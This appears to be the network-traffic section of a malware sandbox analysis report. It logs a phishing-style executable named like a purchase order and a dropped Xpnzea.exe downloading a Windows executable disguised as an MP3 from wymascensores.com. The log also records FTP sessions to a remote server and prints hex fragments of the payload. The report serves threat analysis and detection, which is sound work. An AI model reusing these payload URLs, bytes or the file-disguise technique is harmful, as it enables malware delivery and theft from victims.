                                            Oct 1, 2024 07:31:51.911997080 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912059069 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912107944 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912307978 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912357092 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912507057 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912549019 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912553072 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912563086 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912592888 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912724018 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912779093 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.912930965 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.912978888 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913121939 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913173914 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913176060 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913194895 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913223982 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913240910 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913242102 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913254023 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913285017 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913330078 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.913635969 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.913683891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.915369034 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.915447950 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.932881117 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.932938099 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.932950020 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.932975054 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.932990074 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.933008909 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:51.933191061 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:51.933243990 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.002676964 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.002763033 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.002805948 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.002859116 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.002909899 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.002965927 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003070116 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003117085 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003247023 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003299952 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003412008 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003460884 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003490925 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003545046 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003777027 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.003896952 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.003968954 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004020929 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004036903 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004085064 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004158974 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004216909 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004420996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004468918 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.004587889 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.004679918 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.005613089 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.005696058 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023673058 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023729086 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023751974 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023770094 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023792028 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023813963 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.023857117 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.023910046 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093332052 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093399048 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093410969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093430996 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093458891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093475103 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093486071 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093535900 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093779087 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.093835115 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.093940020 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094043970 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094119072 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094155073 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094175100 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094181061 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094199896 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094218969 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094266891 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094316006 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094703913 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094759941 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.094944954 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.094985962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095001936 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095011950 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095022917 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095046043 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095135927 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095191002 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095316887 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095356941 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095366001 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095371962 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.095397949 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.095413923 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114428997 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114465952 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114541054 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114561081 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114574909 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114597082 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.114703894 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.114757061 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.184653044 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.184751034 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.184753895 CEST4434971467.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:52.184799910 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:52.212735891 CEST49714443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:54.126929045 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.131827116 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.131902933 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.746680975 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.750654936 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.755502939 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.970118046 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:54.972088099 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:54.976918936 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.214142084 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.214277029 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.219082117 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.433476925 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.433727980 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.438534021 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.653544903 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.653718948 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.658544064 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.850820065 CEST4971221192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.873261929 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:55.873579979 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:55.878339052 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.092916012 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.093657970 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.098526001 CEST64722497165.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.098622084 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.098704100 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.103605032 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.715498924 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.716213942 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.716299057 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.721067905 CEST64722497165.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.721389055 CEST64722497165.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.721436024 CEST4971664722192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.757123947 CEST4971521192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:56.936228991 CEST21497155.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:56.975864887 CEST4971521192.168.2.85.2.84.236
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 07:31:25.121555090 CEST5265153192.168.2.81.1.1.1
                                            Oct 1, 2024 07:31:25.509732008 CEST53526511.1.1.1192.168.2.8
                                            Oct 1, 2024 07:31:30.720931053 CEST6044153192.168.2.81.1.1.1
                                            Oct 1, 2024 07:31:30.814199924 CEST53604411.1.1.1192.168.2.8
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 1, 2024 07:31:25.121555090 CEST192.168.2.81.1.1.10x72bfStandard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                            Oct 1, 2024 07:31:30.720931053 CEST192.168.2.81.1.1.10x48edStandard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 1, 2024 07:31:25.509732008 CEST1.1.1.1192.168.2.80x72bfNo error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                            Oct 1, 2024 07:31:30.814199924 CEST1.1.1.1192.168.2.80x48edNo error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                            • wymascensores.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.84970567.212.175.1624432944C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 05:31:26 UTC84OUTGET /servex/Evzbwt.mp3 HTTP/1.1
                                            Host: wymascensores.com
                                            Connection: Keep-Alive
                                            2024-10-01 05:31:26 UTC210INHTTP/1.1 200 OK
                                            Date: Tue, 01 Oct 2024 05:31:25 GMT
                                            Server: Apache
                                            Last-Modified: Mon, 30 Sep 2024 09:28:09 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 1914880
                                            Connection: close
                                            Content-Type: audio/mpeg
                                            2024-10-01 05:31:26 UTC7982INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                            2024-10-01 05:31:26 UTC8000INData Raw: 30 30 30 34 37 42 38 46 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 31 30 30 30 30 32 42 38 30 34 32 30 30 30 30 30 34 32 30 30 35 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 34 39 30 32 30 30 30 34 33 41 45 38 46 38 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 44 44 46 38 46 46 46 46 32 30 30 32 39 31 42 39 42 42 36 35 32 30 31 43 43 30 34 36 31 42 36 31 37 45 35 31 30 32 30 30 30 34 37 42 39 34 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 30 42 45 41 45 41 31 41 37 32 30 39 37 41 35 31 38 41 35 36 31 37 45 35 31 30 32 30 30 30 34 37 42 34 39 30 32 30 30 30 34 36 31 37 45 42 43 30 32 30 30 30 34 32 38 33 46 30 39 30 30 30 36 32 38 31 32 30 30 30
                                            Data Ascii: 00047B8F020004617EBC020004283F090006281100002B804200000420050000007E510200047B490200043AE8F8FFFF26200200000038DDF8FFFF200291B9BB65201CC0461B617E510200047B94020004617EBC020004283F09000620BEAEA1A72097A518A5617E510200047B49020004617EBC020004283F0900062812000
                                            2024-10-01 05:31:26 UTC8000INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 32 32 30 30 31 34 41 35 34 33 30 30 30 30 30 32 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30
                                            Data Ascii: 00000000000000002A220014A5430000022A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A000000133003000400000000000
                                            2024-10-01 05:31:26 UTC8000INData Raw: 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 39 37 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 32 46 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 34 31 31 43 30 30 30 30 30 30 30 30 30 30 30 30 33 38 30 30 30 30 30 30 33 32 30 32 30 30 30 30 36 41 30 32 30 30 30 30 33 41 30 30 30 30 30 30 31 42 30 30 30 30 30 31 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 31 30 33 30 30 30 36 32 30 30
                                            Data Ascii: 000038C1FFFFFF2A7E9702000428AB08000620000000007E510200047B2F02000439A2FFFFFF2620010000003897FFFFFF120000172A000000120000142A0000000330080004000000000000000000172A411C00000000000038000000320200006A0200003A0000001B0000011330030080000000010000112881030006200
                                            2024-10-01 05:31:26 UTC8000INData Raw: 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 31 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 30 36 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 30 31 30 30 30 30 30 30 32 41 37 45 39 38 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 36 35 30 32 30 30 30 34 33 39 43 42 46 46 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 39 37 30 32 30 30 30 34 32 38 41 42 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 31 30 32 30 30 30 34 37 42 38 32 30 32 30 30 30 34 33 41 41 32 46
                                            Data Ascii: 2A13300300800000000100001128810300062001000000FE0E00003800000000FE0C00004503000000060000002F0000000500000038010000002A7E9802000428AF08000620020000007E510200047B6502000439CBFFFFFF26200200000038C0FFFFFF7E9702000428AB08000620000000007E510200047B820200043AA2F
                                            2024-10-01 05:31:26 UTC8000INData Raw: 30 30 30 34 31 34 46 45 30 31 32 41 30 30 30 30 30 30 33 36 32 42 30 35 32 38 43 37 37 32 30 33 35 43 37 45 34 44 30 31 30 30 30 34 32 41 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 39 45 30 30 30 30 30 30 41 37 30 30 30 30 30 30 34 35 30 31 30 30 30 30 36 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 36 32 30 30 30 30 30 30 34 36 30 31 30
                                            Data Ascii: 000414FE012A000000362B0528C772035C7E4D0100042A00001330030004000000000000000000142A1330040004000000000000000000142A1330050004000000000000000000002A0330080004000000000000000000142A41340000020000009E000000A7000000450100006300000000000000020000006200000046010
                                            2024-10-01 05:31:26 UTC8000INData Raw: 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 46 30 41 31 46 30 46 31 46 33 37 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 37 31 46 31 35 31 46 33 38 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 45 31 43 31 46 33 39 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 46 31 46 30 41 31 46 33 41 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 43 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 43 30 33 30
                                            Data Ascii: 120511060911041F0A1F0F1F3706286C03000612041105110609171F151F3806286C03000612031104110511061E1C1F3906286C030006120609110411051F0F1F0A1F3A06286C030006120511060911041C1F0F1F3B06286C030006120411051106091F0D1F151F3C06286C03000612031104110511061A1C1F3D06286C030
                                            2024-10-01 05:31:26 UTC8000INData Raw: 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 32 30 39 37 30 30 30 30 30 30 32 30 34 30 30 30 30 30 30 30 35 39 46 45 30 45 32 37 30 30 46 45 30 43 30 33 30 30 32 30 30 43 30 30 30 30 30 30 46 45 30 43 32 37 30 30 39 43 32 30 36 46 30 30 30 30 30 30 32 30 33 42 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 32 30 44 35 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 39 39 43 32 30 33 31 30 30 30 30 30 30 32 30 32 35 30 30 30 30 30 30 35 38 46 45 30 45 31 31 30 30 46 45 30 43 30 33 30 30 32 30 30 44 30 30 30 30 30 30 46 45 30 43 31 31 30 30 39 43 46 45 30 43 30 33 30 30 32 30 30
                                            Data Ascii: FE0C0300200C000000FE0C11009C2097000000204000000059FE0E2700FE0C0300200C000000FE0C27009C206F000000203B00000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200D00000020D50000002047000000599C2031000000202500000058FE0E1100FE0C0300200D000000FE0C11009CFE0C0300200
                                            2024-10-01 05:31:26 UTC8000INData Raw: 32 35 31 37 32 38 42 43 30 33 30 30 30 36 31 31 30 30 31 31 30 37 32 38 42 44 30 33 30 30 30 36 31 33 31 38 32 38 42 45 30 33 30 30 30 36 31 33 30 31 31 31 30 31 31 31 31 38 31 37 37 33 45 36 30 30 30 30 30 41 32 35 31 31 32 42 31 36 31 31 32 42 38 45 36 39 32 38 42 46 30 33 30 30 30 36 32 35 32 38 43 30 30 33 30 30 30 36 37 45 37 38 30 31 30 30 30 34 32 38 43 31 30 33 30 30 30 36 31 31 30 31 32 38 43 32 30 33 30 30 30 36 32 38 43 33 30 33 30 30 30 36 32 38 43 34 30 33 30 30 30 36 31 31 30 31 32 38 43 35 30 33 30 30 30 36 32 38 43 35 30 33 30 30 30 36 32 38 43 36 30 33 30 30 30 36 32 30 30 30 30 30 30 30 30 30 32 38 44 38 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 42 30
                                            Data Ascii: 251728BC0300061100110728BD030006131828BE0300061301110111181773E600000A25112B16112B8E6928BF0300062528C00300067E7801000428C1030006110128C203000628C303000628C4030006110128C503000628C503000628C6030006200000000028D80300063A0F0000002620000000003804000000FE0C0B0
                                            2024-10-01 05:31:26 UTC8000INData Raw: 32 33 37 45 33 46 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 33 38 30 45 30 30 30 30 30 30 31 31 32 33 37 45 34 30 30 31 30 30 30 41 31 31 32 35 36 46 34 31 30 31 30 30 30 41 31 31 32 35 31 37 35 38 31 33 32 35 31 31 32 35 31 31 32 30 33 46 38 33 46 46 46 46 46 46 31 31 32 33 37 45 34 32 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 32 33 31 31 31 44 33 41 30 41 30 30 30 30 30 30 37 45 34 33 30 31 30 30 30 41 33 38 30 35 30 30 30 30 30 30 37 45 34 34 30 31 30 30 30 41 31 31 31 45 36 46 34 35 30 31 30 30 30 41 31 31 32 33 37 45 34 36 30 31 30 30 30 41 36 46 33 43 30 31 30 30 30 41 31 31 31 41 31 34 31 31 32 32 30 36 36 46 34 37 30 31 30 30 30 41 36 46 31 38 30 31 30 30 30 41 44 44 30 36 30 30 30 30 30 30 32 36 44 44 30 30 30 30 30 30 30 30 31
                                            Data Ascii: 237E3F01000A6F3C01000A380E00000011237E4001000A11256F4101000A112517581325112511203F83FFFFFF11237E4201000A6F3C01000A1123111D3A0A0000007E4301000A38050000007E4401000A111E6F4501000A11237E4601000A6F3C01000A111A141122066F4701000A6F1801000ADD0600000026DD000000001


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.84971067.212.175.1624436876C:\Users\user\AppData\Roaming\Xpnzea.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 05:31:42 UTC84OUTGET /servex/Evzbwt.mp3 HTTP/1.1
                                            Host: wymascensores.com
                                            Connection: Keep-Alive
                                            2024-10-01 05:31:42 UTC210INHTTP/1.1 200 OK
                                            Date: Tue, 01 Oct 2024 05:31:41 GMT
                                            Server: Apache
                                            Last-Modified: Mon, 30 Sep 2024 09:28:09 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 1914880
                                            Connection: close
                                            Content-Type: audio/mpeg
